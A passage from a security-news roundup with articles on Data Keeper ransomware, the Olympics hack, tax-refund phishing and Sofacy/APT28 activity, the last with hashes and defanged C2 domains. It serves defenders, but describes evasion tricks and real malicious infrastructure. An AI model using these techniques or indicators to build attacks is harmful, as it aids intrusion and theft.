First layer is an exe, which will drop another exe to %LocalAppData% with random name & .bin extension, then executes it (WindowStyle.Hidden, Priority.BelowNormal).
That 2nd exe will load a dll, which will load another dll.

10:52 AM - Feb 23, 2018
5
See MalwareHunterTeam's other Tweets
Twitter Ads info and privacy
23 Feb

MalwareHunterTeam
@malwrhunterteam
Replying to @malwrhunterteam
The ITW sample we seen yesterday consists of 4 layers:
First layer is an exe, which will drop another exe to %LocalAppData% with random name & .bin extension, then executes it (WindowStyle.Hidden, Priority.BelowNormal).
That 2nd exe will load a dll, which will load another dll.


MalwareHunterTeam
@malwrhunterteam
All layers have a custom strings and resources protection. And then each layer are protected with ConfuserEx.
Sounds like someone is paranoid...
🤔
😂

11:11 AM - Feb 23, 2018
4
See MalwareHunterTeam's other Tweets
Twitter Ads info and privacy

The Data Keeper ransomware is complex, it is one of the few ransomware strains that use the PsExec tool. The Data Keeper ransomware uses the PsExec to execute the malicious code on other machines on the victims’ networks.

An interesting characteristic implemented by the Data Keeper ransomware is that it doesn’t append an extension to the names of the encrypted files.

24 Feb

BleepingComputer

@BleepinComputer
Data Keeper Ransomware Makes First Victims Two Days After Release on Dark Web RaaS - by @campuscodihttps://www.bleepingcomputer.com/news/security/data-keeper-ransomware-makes-first-victims-two-days-after-release-on-dark-web-raas/ …


MalwareHunterTeam
@malwrhunterteam
To extend what mentioned on the screenshot, it not only not adds an extension, but when encrypting a file, it first reads the lastWriteTime value of it, and after encryption it sets back that value, so you can't even find encrypted files this way... pic.twitter.com/8dadtwXUvW

2:13 PM - Feb 24, 2018
View image on Twitter
8
See MalwareHunterTeam's other Tweets
Twitter Ads info and privacy
With this trick victims won’t be able to know if the files are encrypted unless they try to open one.

“This is actually quite clever, as it introduces a sense of uncertainty for each victim, with users not knowing the amount of damage the ransomware has done to their PCs.” continues Bleeping Computer.

Another singularity of this RaaS platform is the possibility for affiliates to choose what file types to encrypt, affiliated can also set amount of the ransom.

The platform uses a payment service hosted on the Tor network, it is a common option for many malware.

According to the researchers, many crooks have already signed up for the Data Keeper RaaS and are distributing weaponized binaries in the wild.

The experts at MalwareHunter told Bleeping Computer that one of the groups that is distributing the ransomware is hosting the malicious binaries on the server of a home automation system.

Further technical details and the Indicators of Compromise (IOCs) are included in the post published by Bleeping Computer

Recently other RaaS services were spotted by the experts in the underground, GandCrab and Saturn were discovered in the last weeks.


Russia Hacked Olympics Computers, Turned Blame on North Korea: Report
26.2.2018 securityweek BigBrothers

Russian military spies hacked hundreds of computers used by Winter Olympics organizers and tried to make it look like the work of North Korea, the Washington Post reported Sunday, quoting US intelligence sources.

South Korea had previously announced that it was investigating the failure of several Olympic-linked internet sites and broadcast systems just as the opening ceremonies were taking place on February 9.

The Post reported that Russia's GRU military intelligence agency managed to take control in early February of 300 computers linked to the Olympic organization.

As a result, many attendees were unable to print their tickets for the ceremony, leaving empty seats.

It said the Russians had hacked South Korean computer routers and inserted a form of "malware" that allowed them to gather data and paralyze the network.

The Russians used a North Korean internet provider to make it appear the attack originated in North Korea, in what is known as a "false flag" operation, the Post said.

While American officials quoted in the article were unable to say whether the hackers had activated the malware, they said the cyber attack against the Games -- from which Russia's team was excluded for doping -- was worrisome.

Some analysts believe the cyber attack was retribution for that ban. Some Russian athletes were allowed to compete, but only under the designation of "Olympic Athletes from Russia."

The Winter Games saw dramatic gestures aimed at easing the raw tensions dividing the two Koreas, as both countries' athletes marched together during the opening ceremonies, and they fielded a single women's ice hockey team.

The sister of North Korean leader Kim Jong-Un made several high-profile appearances in the early days of the Games, and a large squad of North Korean cheerleaders drew intense interest.

Finally, at the Games' closing ceremony Sunday, South Korean President Moon Jae-in and North Korean General Kim Yong Chol -- a man considered a "war criminal" by many in the South for his role in two deadly attacks on Southern targets -- exchanged a very public handshake.


Microsoft Data Warrant Case in Top US Court Has Global Implications
26.2.2018 securityweek BigBrothers

Microsoft faces off with the US government before the Supreme Court Tuesday over a warrant for data stored abroad that has important ramifications for law enforcement in the age of global computing.

The case, which dates back to 2013, involves a US warrant ordering Microsoft to turn over the contents of an email account used by a suspected drug trafficker, whose data is stored in a cloud computing center in Ireland.

It has been watched closely because of its implications for privacy and surveillance in the digital age, and specifically how law enforcement can reach across borders to obtain digital evidence that may be scattered across the globe.

Microsoft has maintained that US courts lack jurisdiction over the data stored in Ireland.

The US tech giant, backed by many firms in the sector and civil liberties groups, argues the case is critical in showing that American authorities cannot simply request such data via a warrant without going through the process set out in law enforcement treaties between countries.

- The Snowden effect -

Microsoft president Brad Smith told reporters last week the principle is especially relevant after former intelligence contractor Edward Snowden leaked details on global US surveillance programs in 2013.

"We've always said it was important to win this case to win the confidence of people around the world in American technology," Smith said in a conference call.

Smith said officials in Europe have been notably concerned about the implications of a decision in favor of the US government, and that was made clear during a discussion with a German official on the case after a lower judge ruled against Microsoft.

"He said that unless we persist with this lawsuit and turned it around, no German state would ever store data in a data center operated by an American company," Smith said.

Last year, a federal appeals court sided with Microsoft, overturning a district judge ruling.

Yet the case is complicated by the intricacies of cloud computing, which allow data to be split up and stored in multiple locations around the world even for a single user, and some analysts say the court has no good solution.

"The speed by which data can be moved about the globe, the fact of third-party control and the possibility of data being held in locations that have absolutely no connection to either the crime or target being investigated makes location of the 0s and 1s that comprise our emails a particularly poor basis for delimiting jurisdiction," American University law professor Jennifer Daskal wrote on the Just Security blog.

"Conversely, there is a real risk that a straight-up US government win will -- rightly or wrongly -- be perceived around the world as US law enforcement claiming the right to access data anywhere, without regard to the countervailing sovereign interests. This creates a precedent that foreign nations are likely to mimic."

- 'Larger problem' -

Both sides have said that any court decision may be flawed, and that Congress needs to address the issue by rewriting the 1986 Stored Communications Act at issue.

Microsoft's Smith said he was encouraged by a bill introduced this year called the CLOUD Act that would authorize cross-border data warrants with countries that meet certain standards for privacy and civil liberties.

The proposal has the backing of the tech sector, according to Smith, and respects the laws of each country where a request is made.

John Carlin, a former assistant US attorney general for national security, agreed that a legislative solution is preferable.

"Regardless of how this case turns out, it's not going to solve the larger problem," Carlin said.

Carlin said current law affecting crimes with cross-border components are not designed for the digital age.

"The problem now is there is a lack of clarity over how you can serve traditional legal process for what used to be local crimes," he added. Carlin said the CLOUD bill could address the issues because it "provides incentives for countries that have protections for civil liberties."

But some civil liberties activists have expressed concern the measure would expand US surveillance capabilities.

The measure "would give unlimited jurisdiction to US law enforcement over any data controlled by a service provider, regardless of where the data is stored and who created it," said Camille Fischer of the Electronic Frontier Foundation.

It also "creates a dangerous precedent for other countries who may want to access information stored outside their own borders, including data stored in the United States," she said.


Tax refund, or How to lose your remaining cash
25.2.2018 Kaspersky
Spam
Every year, vast numbers of people around the globe relish the delightful prospect of filling out tax returns, applying for tax refunds, etc. Given that tax authorities and their taxpayers are moving online, it’s no surprise to find cybercriminals hard on their heels. By spoofing trusted government agency websites and luring users onto them, phishers try to collect enough information to steal both money from victims’ accounts and their digital identity.

Attackers employ standard methods that basically center on creating phishing sites and web pages. Such resources can prompt for passwords to My Account areas on the websites of local tax services, answers to security questions, names and dates of birth of relatives, information about bank cards, and much more besides. In addition to information that users themselves unwittingly hand over, scammers often get hold of extra tidbits such as victim IP address and location, browser name and version, operating system. That is, anything that increases the chances of a successful bypass of the protection system into the victim’s accounts.

Phishing pages can also spread malware under various guises. Fraudsters don’t shy away from direct extortion under the cloak of tax agents — such attacks have occurred in the US, France, Canada, Ireland, and elsewhere. Let’s examine the most common tax-phishing schemes in more detail.

Canada (CRA)
In Canada, the body responsible for tax collection and administration is the Canadian Revenue Agency (CRA). The deadline for filing tax returns for the past financial year is April 30. The figure below shows phishing activity in 2016 spiking in the days leading up to this deadline, and only abating in May.

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the CRA brand, 2016

A slightly different picture is observed on the 2017 graph:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the CRA brand, 2017

A surge came when many Canadians were expecting a tax refund of some sort. We registered a huge number of phishing pages informing people that they were entitled to receive a certain amount of money. It was mostly these messages that distributed links to fake CRA pages where victims were asked to fill out a web form.

Example of a phishing letter allegedly from the CRA with a fake notification about a potential refund.

Typically, such pages are almost a carbon copy of the official CRA site and request a large amount of personal information. If the user doesn’t doubt the site’s authenticity, he or she will have no qualms about filling in the many fields. As a result, the attackers get hold of valuable information, while users are notified of a two-day wait while their data is “processed.” For added plausibility, the victim can be redirected to the original CRA site.

Among the information that the fraudsters collect are bank card details (including PIN code), social security number, driver’s license number, address, telephone number, date of birth, mother’s maiden name, and employer. The attackers also retrieve the IP address and system information.

Example of a phishing page masquerading as a CRA site. When all personal information is entered and the form is submitted, the script generates an email with all the data input (as well as the victim’s IP address and data received from the User Agent) and sends it to the specified address

Criminals do not focus solely on tax declarations and refunds. They make repeated attempts throughout the year to extract data under the guise of the CRA. For example, one of the emails we found invited the recipient to view information about a “tax incident,” prompting them to enter a login and password for a Dropbox account, or provide email credentials. After that, the victim clicked a button to download a public PDF document with information about alleged changes to the tax legislation. The data entered was forwarded to the scammers.

Example of tax and CRA-themed phishing to get Dropbox and mail credentials

Scammers do not restrict themselves to fake sites and emails. They also send out SMS messages and even call victims pretending to be from the CRA, demanding urgent payment of debts by wiring money to a certain account. Such calls are often accompanied by intimidation (threats of penalties, fines, and even imprisonment are used).

Taxpayers in Canada should remember that the CRA never sends emails containing links or requests for personal data, except when an email is sent directly during a telephone conversation with a CRA agent.

CRA recommendations on how to avoid scams are available on its official site under Security.

United States (IRS)
In the US, the tax body is the Internal Revenue Service (IRS), and the tax return deadline is usually April 18 (the date may vary slightly from year to year). In 2016, as in Canada, a major fraud outbreak occurred in the run-up to the deadline:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the IRS brand, 2016

However, we observed bursts of scamming activity throughout the year. That made it difficult to single out a specific moment in 2017, save for a notable pre-New Year spike:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites using the IRS brand, 2017

Scammers use a range of topics to bait US taxpayers: tax refund, personal information update, account confirmation, etc.

Examples of fake IRS emails

Tax refund forms are a very popular tool for phishers in the US, and scam sites that exploit this method typically appear at the start of the tax return period. The amount of data they steal is staggering: anything they can and more besides. They exploit users’ very strong urge to claw back some of their hard-earned cash.

Fake IRS pages prompting users to fill out a tax refund form

An information leak on this scale might not only empty the victim’s bank accounts, but lead to a host of other problems, including targeted attacks and attempts to access other accounts. Whereas a compromised bank card is easily blocked and reissued, one’s address, social security number, date of birth, and mother’s maiden name are rather less flexible.

Another way to dupe victims is to send a fake tax service message containing a link to confirm their account, update personal information, or restore their password:

Examples of phishing pages using the IRS brand

After the data is forwarded to the scammers, the victim is usually redirected to the original site not to arouse suspicions:

Example of a phishing script sending user data to a fraudulent email address. If the information is successfully forwarded, the victim is redirected to the original tax service website

Besides the IRS brand, scammers use the name of Intuit, the developer of the TurboTax program, which helps fill out tax returns.

Example of a phishing email using the Intuit brand

Scammers try to get user credentials for the Intuit site, as well as email logins and passwords:

Examples of phishing pages using the Intuit brand

Links to phishing pages in the US are distributed not only by email, but by SMS and social media. Remember that the IRS doesn’t initiate contact with taxpayers through these channels to request personal information.

Official IRS anti-phishing recommendations are available on the department’s website..

United Kingdom (HMRC)
The UK tax (fiscal) year runs from April 6 through April 5 the following year. The PAYE (Pay As You Earn) system means that most taxpayers are not required to fill out any forms by a certain deadline (HMRC receives monthly data from the employer). However, if a taxpayer’s income changes, he/she must update their tax code in accordance with the new income level. And in the event that the taxpayer owes money or is due a reimbursement, HMRC (Her Majesty’s Revenue and Customs) will make contact to arrange payment. That’s where scammers set traps informing potential victims about a potential refund or (less often) monies owed.

In 2016, phishing activity in this segment in the UK was very high, rising toward the end of the calendar year:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites exploiting the name of the UK’s HMRC, 2016

In 2017, phishers cast their nets in May (this month saw two major outbreaks of activity) and remained active pretty much until the end of the calendar year.

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to phishing sites exploiting the name of the UK’s HMRC, 2017

Scam emails supposedly from HMRC are sent to UK residents via SMS, social media, and email, and contain links to phishing pages that strongly resemble the official website. To claim their “refund,” users are usually asked to enter bank card details and other important information.

Examples of phishing pages using the HMRC brand.

In addition, scammers try to steal credentials for other services. In the example below, the scammers sent an email seemingly from HMRC with a PDF attachment (in fact an HTML file). On opening it, the user is shown a page in the style of an Adobe online resource, and is prompted for an email login and password to view the PDF. These credentials are, of course, sent to the attackers.

A fake PDF directing victims to a page used by cybercriminals to steal email account credentials

Anti-phishing recommendations can be viewed on the official HMRC website.

France (DGFiP, impots.gouv.fr)
In France, tax collection is the responsibility of the General Directorate of Public Finance (La Générale des finances publique, DGFiP); the start of the fiscal year coincides with that of the calendar year. The French have no PAYE system (one is planned for implementation in 2019), and the deadline for tax returns is set by each individual département. Tax declarations can be filed in paper form (soon to be discontinued) and online. What’s more, the paper deadline is earlier than the electronic one. Generally, the submission deadlines fall in May-June.

As we can see on the graphs, phishing activity surged during this very period:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to fake DGFiP phishing sites, 2016

2017 saw two flashes of activity: during the filing period and at the end of the year:

Number of Anti-Phishing triggers on user computers caused by attempts to redirect to fake DGFiP phishing sites, 2017

The most popular topic for scammers, as before, is the offer of a refund:

Example of a phishing email exploiting the subject of tax refunds

Clicking on links in such messages takes users to phishing pages where they are prompted to enter bank card details and other personal information:

Examples of fake pages masquerading as the French tax service

Official warning about scammers on the DGFiP website.

Other countries
Taxes are a common scamming topic in other countries, too. Personal information is solicited for under various pretexts: tax return completion, account verification, tax refund, system registration, etc.

Example of a fake page of the Revenue Commissioners of the Republic of Ireland

Scammers not only target taxpayers’ personal data, but sometimes aim to install malware on their computers. For example, one spam mailing contained a link to a fake site of the Federal Tax Service (FTS) of the Russian Federation, where a Trojan was downloaded to the victim’s computer.

A spoof FTS site distributing malware

Not only taxes
Posing as the state, attackers have other topics than taxes up their sleeve. For example, scammers in Hungary held fake prize giveaways in the name of the government:

Smartphone giveaway by the “Hungarian government”

In Italy, fraudsters rather ingeniously extorted money under the guise of the Ministry of Defense. To conceal its real address, the site opened (if the user allowed it) in full-screen mode with the control elements and address bar hidden, and then proceeded to simulate these interface elements. Naturally, the fake address bar displayed the Ministry’s legitimate URL.

Fake Italian “Ministry of Defense” website

Scaring users into thinking they had distributed prohibited materials (pornography, pedophilia, zoophilia), the site blocked the computer and demanded a fine in the form of a €500 iTunes gift card to have it unblocked.

Conclusion
Trust in government websites is very high, and filing of tax returns always involves submitting large quantities of personal information. Therefore, if users are sure that they are on the official tax service website, they will not hesitate to share important details about themselves. Another important aspect is that many online tax return filers are not everyday netizens, and thus know little about online fraud and cannot recognize a scam when they see one. But even regular Internet users can be wrong-footed by a tempting (and often expected) tax refund notice. Scammers take full advantage of this. In sum, always treat monetary offers with a healthy dollop of skepticism, and bookmark the official site of your country’s tax service in your browser to help avoid getting hooked by phishers.


A Slice of 2017 Sofacy Activity
25.2.2018 Kaspersky
Phishing  APT
Sofacy, also known as APT28, Fancy Bear, and Tsar Team, is a highly active and prolific APT. From their high volume 0day deployment to their innovative and broad malware set, Sofacy is one of the top groups that we monitor, report, and protect against. 2017 was not any different in this regard. Our private reports subscription customers receive a steady stream of YARA, IOC, and reports on Sofacy, our most reported APT for the year.

This high level of cyber-espionage activity goes back years. In 2011-2012, the group used a relatively tiny implant (known as “Sofacy” or SOURFACE) as their first stage malware, which at the time had similarities with the old Miniduke implants. This made us believe the two groups were connected, although it looks they split ways at a certain point, with the original Miniduke group switching to the CosmicDuke implant in 2014. The division in malware was consistent and definitive at that point.

In 2013, the Sofacy group expanded their arsenal and added more backdoors and tools, including CORESHELL, SPLM (aka Xagent, aka CHOPSTICK), JHUHUGIT (which is built with code from the Carberp sources), AZZY (aka ADVSTORESHELL, NETUI, EVILTOSS, and spans across 4-5 generations) and a few others. We’ve seen quite a few versions of these implants, which were relatively widespread at some point or still are. In 2015 we noticed another wave of attacks which took advantage of a new release of the AZZY implant, largely undetected by antivirus products. The new wave of attacks included a new generation of USB stealers deployed by Sofacy, with initial versions dating to February 2015. It appeared to be geared exclusively towards high profile targets.

Sofacy’s reported presence in the DNC network alongside APT29 brought possibly the highest level of public attention to the group’s activities in 2016, especially when data from the compromise was leaked and “weaponized”. And later 2016, their focus turned towards the Olympics’ and the World Anti-Doping Agency (WADA) and Court of Arbitration for Sports (CAS), when individuals and servers in these organizations were phished and compromised. In a similar vein with past CyberBerkut activity, attackers hid behind anonymous activist groups like “anonpoland”, and data from victimized organizations were similarly leaked and “weaponized”.

This write-up will survey notables in the past year of 2017 Sofacy activity, including their targeting, technology, and notes on their infrastructure. No one research group has 100% global visibility, and our collected data is presented accordingly. Here, external APT28 reports on 2017 Darkhotel-style activity in Europe and Dealer’s Choice spearphishing are of interest. From where we sit, 2017 Sofacy activity starts with a heavy focus on NATO and Ukrainian partners, coinciding with lighter interest in Central Asian targets, and finishing the second half of the year with a heavy focus on Central Asian targets and some shift further East.

Dealer’s Choice
The beginning of 2017 began with a slow cleanup following the Dealer’s Choice campaign, with technical characteristics documented by our colleagues at Palo Alto in several stages at the end of 2016. The group spearphished targets in several waves with Flash exploits leading to their carberp based JHUHUGIT downloaders and further stages of malware. It seems that many folks did not log in and pull down their emails until Jan 2017 to retrieve the Dealer’s Choice spearphish. Throughout these waves, we observed that the targets provided connection, even tangential, to Ukraine and NATO military and diplomatic interests.

In multiple cases, Sofacy spoofs the identity of a target, and emails a spearphish to other targets of interest. Often these are military or military-technology and manufacturing related, and here, the DealersChoice spearphish is again NATO related:

The global reach that coincided with this focus on NATO and the Ukraine couldn’t be overstated. Our KSN data showed spearphishing targets geolocated across the globe into 2017.
AM, AZ, FR, DE, IQ, IT, KG, MA, CH, UA, US, VN

DealersChoice emails, like the one above, that we were able to recover from third party sources provided additional targeting insight, and confirmed some of the targeting within our KSN data:
TR, PL, BA, AZ, KR, LV, GE, LV, AU, SE, BE

0day Deployment(s)
Sofacy kicked off the year deploying two 0day in a spearphish document, both a Microsoft Office encapsulated postscript type confusion exploit (abusing CVE-2017-0262) and an escalation of privilege use-after-free exploit (abusing CVE-2017-0263). The group attempted to deploy this spearphish attachment to push a small 30kb backdoor known as GAMEFISH to targets in Europe at the beginning of 2017. They took advantage of the Syrian military conflict for thematic content and file naming “Trump’s_Attack_on_Syria_English.docx”. Again, this deployment was likely a part of their focus on NATO targets.

Light SPLM deployment in Central Asia and Consistent Infrastructure
Meanwhile in early-to-mid 2017, SPLM/CHOPSTICK/XAgent detections in Central Asia provided a glimpse into ongoing focus on ex-Soviet republics in Central Asia. These particular detections are interesting because they indicate an attempted selective 2nd stage deployment of a backdoor maintaining filestealer, keylogger, and remoteshell functionality to a system of interest. As the latest revision of the backdoor, portions of SPLM didn’t match previous reports on SPLM/XAgent while other similarities were maintained. SPLM 64-bit modules already appeared to be at version 4 of the software by May of the year. Targeting profiles included defense related commercial and military organizations, and telecommunications.

Targeting included TR, KZ, AM, KG, JO, UK, UZ

Heavy Zebrocy deployments
Since mid-November 2015, the threat actor referred to as “Sofacy” or “APT28” has been utilizing a unique payload and delivery mechanism written in Delphi and AutoIT. We collectively refer to this package and related activity as “Zebrocy” and had written a few reports on its usage and development by June 2017 – Sofacy developers modified and redeployed incremented versions of the malware. The Zebrocy chain follows a pattern: spearphish attachment -> compiled Autoit script (downloader) -> Zebrocy payload. In some deployments, we observed Sofacy actively developing and deploying a new package to a much smaller, specific subset of targets within the broader set.

Targeting profiles, spearphish filenames, and lures carry thematic content related to visa applications and scanned images, border control administration, and various administrative notes. Targeting appears to be widely spread across the Middle East, Europe, and Asia:</p style=”margin-bottom:0!important”>

Business accounting practices and standards
Science and engineering centers
Industrial and hydrochemical engineering and standards/certification
Ministry of foreign affairs
Embassies and consulates
National security and intelligence agencies
Press services
Translation services
NGO – family and social service
Ministry of energy and industry
We identified new MSIL components deployed by Zebrocy. While recent Zebrocy versioning was 7.1, some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0. The components were an unexpected inclusion in this particular toolset. For example, one sent out to a handful of countries identifies network drives when they are added to target systems, and then RC4-like-encrypts and writes certain file metadata and contents to a local path for later exfiltration. The stealer searches for files 60mb and less with these extensions:</p style=”margin-bottom:0!important”>

.doc
.docx
.xls
.xlsx
.ppt
.pptx
.exe
.zip
.rar
At execution, it installs an application-defined Windows hook. The hook gets windows messages indicating when a network drive has been attached. Upon adding a network drive, the hook calls its “RecordToFile” file stealer method.

Zebrocy spearphishing targets:
AF, AM, AU, AZ, BD, BE, CN, DE, ES, FI, GE, IL, IN, JO, KW, KG, KZ, LB, LT, MN, MY, NL, OM, PK, PO, SA, ZA, SK, SE, CH, TJ, TM, TR, UA, UAE, UK, US, UZ

SPLM deployment in Central Asia
SPLM/CHOPSTICK components deployed throughout 2017 were native 64-bit modular C++ Windows COM backdoors supporting http over fully encrypted TLSv1 and TLSv1.2 communications, mostly deployed in the second half of 2017 by Sofacy. Earlier SPLM activity deployed 32-bit modules over unencrypted http (and sometimes smtp) sessions. In 2016 we saw fully functional, very large SPLM/X-Agent modules supporting OS X.

The executable module continues to be part of a framework supporting various internal and external components communicating over internal and external channels, maintaining slightly morphed encryption and functionality per deployment. Sofacy selectively used SPLM/CHOPSTICK modules as second stage implants to high interest targets for years now. In a change from previous compilations, the module was structured and used to inject remote shell, keylogger, and filesystem add-ons into processes running on victim systems and maintaining functionality that was originally present within the main module.

The newer SPLM modules are deployed mostly to Central Asian based targets that may have a tie to NATO in some form. These targets include foreign affairs government organizations both localized and abroad, and defense organizations’ presence localized, located in Europe and also located in Afghanistan. One outlier SPLM target profile within our visibility includes an audit and consulting firm in Bosnia and Herzegovina.

Minor changes and updates to the code were released with these deployments, including a new mutex format and the exclusive use of encrypted HTTP communications over TLS. The compiled code itself already is altered per deployment in multiple subtle ways, in order to stymie identification and automated analysis and accommodate targeted environments. Strings (c2 domains and functionality, error messages, etc) are custom encrypted per deployment.

Targets: TR, KZ, BA, TM, AF, DE, LT, NL

SPLM/CHOPSTICK/XAgent Modularity and Infrastructure
This subset of SPLM/CHOPSTICK activity leads into several small surprises that take us into 2018, to be discussed in further detail at SAS 2018. The group demonstrates malleability and innovation in maintaining and producing familiar SPLM functionality, but the pragmatic and systematic approach towards producing undetected or difficult-to-detect malware continues. Changes in the second stage SPLM backdoor are refined, making the code reliably modular.

Infrastructure Notes
Sofacy set up and maintained multiple servers and c2 for varying durations, registering fairly recognizable domains with privacy services, registrars that accept bitcoin, fake phone numbers, phony individual names, and 1 to 1 email address to domain registration relationships. Some of this activity and patterns were publicly disclosed, so we expect to see more change in their process in 2018. Also, throughout the year and in previous years, researchers began to comment publicly on Sofacy’s fairly consistent infrastructure setup.

As always, attackers make mistakes and give away hints about what providers and registrars they prefer. It’s interesting to note that this version of SPLM implements communications that are fully encrypted over HTTPS. As an example, we might see extraneous data in their SSL/TLS certificates that give away information about their provider or resources. Leading up to summer 2017, infrastructure mostly was created with PDR and Internet Domain Service BS Corp, and their resellers. Hosting mostly was provided at Fast Serv Inc and resellers, in all likelihood related to bitcoin payment processing.

Accordingly, the server side certificates appear to be generated locally on VPS hosts that exclusively are paid for at providers with bitcoin merchant processing. One certificate was generated locally on what appeared to be a HP-UX box, and another was generated on “8569985.securefastserver[.]com” with an email address “root@8569985.securefastserver[.]com”, as seen here for their nethostnet[.]com domain. This certificate configuration is ignored by the malware.

In addition to other ip data, this data point suggested that Qhoster at https://www.qhoster[.]com was a VPS hosting reseller of choice at the time. It should be noted that the reseller accepted Alfa Click, PayPal, Payza, Neteller, Skrill, WebMoney, Perfect Money, Bitcoin, Litecoin, SolidTrust Pay, CashU, Ukash, OKPAY, EgoPay, paysafecard, Alipay, MG, Western Union, SOFORT Banking, QIWI, Bank transfer for payment.

Conclusion
Sofacy, one of the most active APT we monitor, continues to spearphish their way into targets, reportedly widely phishes for credentials, and infrequently participates in server side activity (including host compromise with BeEF deployment, for example). KSN visibility and detections suggests a shift from their early 2017 high volume NATO spearphish targeting towards the middle east and Central Asia, and finally moving their focus further east into late 2017. Their operational security is good. Their campaigns appear to have broken out into subsets of activity and malware involving GAMEFISH, Zebrocy, and SPLM, to name a few. Their evolving and modified SPLM/CHOPSTICK/XAgent code is a long-standing part of Sofacy activity, however much of it is changing. We’ll cover more recent 2018 change in their targeting and the malware itself at SAS 2018.

With a group like Sofacy, once their attention is detected on a network, it is important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two factor authentication for services like email and vpn access. In order to identify their presence, not only can you gain valuable insight into their targeting from intelligence reports and gain powerful means of detections with hunting tools like YARA, but out-of-band processing with a solution like KATA is important.

Technical Appendix
Related md5
8f9f697aa6697acee70336f66f295837
1a4b9a6b321da199aa6d10180e889313
842454b48f5f800029946b1555fba7fc
d4a5d44184333442f5015699c2b8af28
1421419d1be31f1f9ea60e8ed87277db
b1d1a2c64474d2f6e7a5db71ccbafa31
953c7321c4959655fdd53302550ce02d
57601d717fcf358220340675f8d63c8a
02b79c468c38c4312429a499fa4f6c81
85cd38f9e2c9397a18013a8921841a04
f8e92d8b5488ea76c40601c8f1a08790
66b4fb539806ce27be184b6735584339
e8e1fcf757fe06be13bead43eaa1338c
953c7321c4959655fdd53302550ce02d
aa2aac4606405d61c7e53140d35d7671
85cd38f9e2c9397a18013a8921841a04
57601d717fcf358220340675f8d63c8a
16e1ca26bc66e30bfa52f8a08846613d
f8e92d8b5488ea76c40601c8f1a08790
b137c809e3bf11f2f5d867a6f4215f95
237e6dcbc6af50ef5f5211818522c463
88009adca35560810ec220544e4fb6aa
2163a33330ae5786d3e984db09b2d9d2
02b79c468c38c4312429a499fa4f6c81
842454b48f5f800029946b1555fba7fc
d4a5d44184333442f5015699c2b8af28
b88633376fbb144971dcb503f72fd192
8f9f697aa6697acee70336f66f295837
b6f77273cbde76896a36e32b0c0540e1
1a4b9a6b321da199aa6d10180e889313
1421419d1be31f1f9ea60e8ed87277db
1a4b9a6b321da199aa6d10180e889313
9b10685b774a783eabfecdb6119a8aa3
aa34fb2e5849bff4144a1c98a8158970
aced5525ba0d4f44ffd01c4db2730a34
b1d1a2c64474d2f6e7a5db71ccbafa31
b924ff83d9120d934bb49a7a2e3c4292
cdb58c2999eeda58a9d0c70f910d1195
d4a5d44184333442f5015699c2b8af28
d6f2bf2066e053e58fe8bcd39cb2e9ad
34dc9a69f33ba93e631cd5048d9f2624
1c6f8eba504f2f429abf362626545c79
139c9ac0776804714ebe8b8d35a04641
e228cd74103dc069663bb87d4f22d7d5
bed5bc0a8aae2662ea5d2484f80c1760
8c3f5f1fff999bc783062dd50357be79
5882a8dd4446abd137c05d2451b85fea
296c956fe429cedd1b64b78e66797122
82f06d7157dd28a75f1fbb47728aea25
9a975e0ddd32c0deef1318c485358b20
529424eae07677834a770aaa431e6c54
4cafde8fa7d9e67194d4edd4f2adb92b
f6b2ef4daf1b78802548d3e6d4de7ba7
ede5d82bb6775a9b1659dccb699fadcb
116d2fc1665ce7524826a624be0ded1c
20ff290b8393f006eaf4358f09f13e99
4b02dfdfd44df3c88b0ca8c2327843a4
c789ec7537e300411d523aef74407a5e
0b32e65caf653d77cab2a866ee2d9dbc
27faa10d1bec1a25f66e88645c695016
647edddf61954822ddb7ab3341f9a6c5
2f04b8eb993ca4a3d98607824a10acfb
9fe3a0fb3304d749aeed2c3e2e5787eb
62deab0e5d61d6bf9e0ba83d9e1d7e2b
86b607fe63c76b3d808f84969cb1a781
f62182cf0ab94b3c97b0261547dfc6cf
504182aaa5575bb38bf584839beb6d51
d79a21970cad03e22440ea66bd85931f

Related domains
nethostnet[.]com
hostsvcnet[.]com
etcrem[.]net
movieultimate[.]com
newfilmts[.]com
fastdataexchange[.]org
liveweatherview[.]com
analyticsbar[.]org
analyticstest[.]net
lifeofmentalservice[.]com
meteost[.]com
righttopregnantpower[.]com
kiteim[.]org
adobe-flash-updates[.]org
generalsecurityscan[.]com
globalresearching[.]org
lvueton[.]com
audiwheel[.]com
online-reggi[.]com
fsportal[.]net
netcorpscanprotect[.]com
mvband[.]net
mvtband[.]net
viters[.]org
treepastwillingmoment[.]com
sendmevideo[.]org
satellitedeluxpanorama[.]com
ppcodecs[.]com
encoder-info[.]tk
wmdmediacodecs[.]com
postlkwarn[.]com
shcserv[.]com
versiontask[.]com
webcdelivery[.]com
miropc[.]org
securityprotectingcorp[.]com
uniquecorpind[.]com
appexsrv[.]net
adobeupgradeflash[.]com


Counterfeit Code-Signing certificates even more popular, but still too expensive
25.2.2018 securityafffairs  Krypto

Code-signing certificates are precious commodities in the criminal underground, they are used by vxers to sign malware code to evade detection.
Other precious commodities in the criminal underground are code-signing certificates, they allow vxers to sign the code for malware to evade detection. Operators of the major black markets in the darknets buy and sell code-signing certificates, but according to an interesting research conducted by threat intelligence firm Recorded Future, the prices for them are too expensive for most hackers.

Cybercriminals would use the Dark Web for selling high-grade code certificates -which they have obtained from trusted certificate authorities- to anyone that is interested in purchasing them.

Sales of code signing certificates have increased considerably since 2015 when experts from IBM X-Force researchers provided some best practice guides on checking for trusted certificates.

Digital certificates allow companies to trust the source code of a software and to check its integrity, The certificates are issued by the certificate authorities (CAs) and are granted to companies that generate code, protocols or software so they can sign their code and indicate its legitimacy and originality.

Using signing certificates is similar to the hologram seal used on software packages, assuring they are genuine and issued from a trusted publisher. Users would receive alerts in an attempt to install files that are not accompanied by a valid certificate. This is why cybercriminals aim to use certificates for legitimizing the malware code they make.

According to Andrei Barysevich, Director of Advanced Collection at Recorded Future, most of the code-signing certificates are obtained by hackers due to fraud and not from security breaches suffered by the CAs.

“Recorded Future’s Insikt Group investigated the criminal underground and identified vendors currently offering both code signing certificates and domain name registration with accompanying SSL certificates.” states the report published by Recorded Future.

